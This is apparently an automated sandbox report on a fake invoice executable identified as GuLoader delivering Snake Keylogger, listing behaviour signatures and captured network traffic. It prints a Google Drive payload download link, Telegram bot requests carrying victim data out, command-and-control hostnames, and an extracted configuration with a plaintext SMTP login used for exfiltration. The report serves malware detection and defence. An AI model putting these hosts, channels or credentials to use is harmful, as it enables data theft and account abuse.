Windows Analysis Report
FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe

Overview

General Information

Sample name: FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe
Analysis ID: 1559215
MD5: 99be54eef515e3bb933f1b7fe2746e7d
SHA1: 2c5351daf0d3f6d86541bf432680cab4b284f72d
SHA256: c46baa7cd710456d6f6a990295e929d62305036cc1592508ecea040a7bd3eb5b
Tags: exeuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000007.00000002.2682565213.0000000024661000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "atu.petronila@burgosatu.es", "Password": "55#cHsR%iCPw", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\argoters\Necrotizing\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe ReversingLabs: Detection: 15%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49716 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49732 version: TLS 1.2
Source: FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2067306282.0000000008378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2067306282.0000000008378000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_004065FD FindFirstFileW,FindClose, 0_2_004065FD
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059CC
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 0323F45Dh 7_2_0323F2C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 0323F45Dh 7_2_0323F4AC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 0323FC19h 7_2_0323F961
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C76347h 7_2_26C75FD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C76970h 7_2_26C76678
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7BAB8h 7_2_26C7B7C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C73996h 7_2_26C736C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7E5C0h 7_2_26C7E2C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7079Eh 7_2_26C704D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C777C8h 7_2_26C774D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7A2D0h 7_2_26C79FD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7CDD8h 7_2_26C7CAE0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C742B6h 7_2_26C73FE8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7F8E0h 7_2_26C7F5E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C710BEh 7_2_26C70DF0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C78AE8h 7_2_26C787F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C722C6h 7_2_26C71FF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7B5F0h 7_2_26C7B2F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7154Eh 7_2_26C71280
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C79478h 7_2_26C79180
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C72756h 7_2_26C72488
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7BF80h 7_2_26C7BC88
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7EA88h 7_2_26C7E790
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C75066h 7_2_26C74D98
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C77C90h 7_2_26C77998
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C71E47h 7_2_26C71BA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7A798h 7_2_26C7A4A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C73076h 7_2_26C72DA8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7D2A0h 7_2_26C7CFA8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7FDA8h 7_2_26C7FAB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C75986h 7_2_26C756B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C78FB0h 7_2_26C78CB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7030Eh 7_2_26C70040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C76E38h 7_2_26C76B40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C75E16h 7_2_26C75B48
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C79940h 7_2_26C79648
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7C448h 7_2_26C7C150
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C73E26h 7_2_26C73B58
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7EF50h 7_2_26C7EC58
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C70C2Eh 7_2_26C70960
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C78158h 7_2_26C77E60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7AC60h 7_2_26C7A968
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7D768h 7_2_26C7D470
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C74746h 7_2_26C74478
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7E0F8h 7_2_26C7DE00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C74BD7h 7_2_26C74908
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C77300h 7_2_26C77008
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C719DEh 7_2_26C71710
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C79E08h 7_2_26C79B10
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C72BE6h 7_2_26C72918
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7C910h 7_2_26C7C618
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7F418h 7_2_26C7F120
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C754F6h 7_2_26C75228
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C78620h 7_2_26C78328
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7B128h 7_2_26C7AE30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C73506h 7_2_26C73238
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 26C7DC30h 7_2_26C7D938

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:01:55%0D%0ACountry%20Name:%20United%20States%0D%0A[%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49713 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49718 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49725 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49711 -> 142.250.186.110:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 188.114.96.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1Xktub0OonXhk1ud5RAJ48q4AKGZrLavT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1Xktub0OonXhk1ud5RAJ48q4AKGZrLavT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49716 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1Xktub0OonXhk1ud5RAJ48q4AKGZrLavT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1Xktub0OonXhk1ud5RAJ48q4AKGZrLavT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:01:55%0D%0ACountry%20Name:%20United%20States%0D%0A[%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 09:16:40 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe, 00000000.00000002.1445010133.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe, 00000000.00000000.1411822166.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2060874962.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2057919446.0000000004BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2057919446.0000000004A61000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2682565213.0000000024661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2057919446.0000000004BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2057919446.0000000004A61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024742000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024742000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024742000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024742000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20a
Source: msiexec.exe, 00000007.00000003.2168707061.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2168590957.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000007.00000002.2682565213.000000002481F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2682565213.0000000024850000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000007.00000002.2682565213.000000002481A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000002.00000002.2060874962.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2060874962.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2060874962.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000007.00000002.2668131484.0000000008C5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000007.00000002.2668131484.0000000008C5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681708458.0000000023C90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1Xktub0OonXhk1ud5RAJ48q4AKGZrLavT
Source: msiexec.exe, 00000007.00000003.2201368273.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2668131484.0000000008CB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000007.00000003.2168707061.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2668131484.0000000008CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2168590957.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1Xktub0OonXhk1ud5RAJ48q4AKGZrLavT&export=download
Source: msiexec.exe, 00000007.00000003.2201368273.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2668131484.0000000008CB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/y8A
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2057919446.0000000004BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
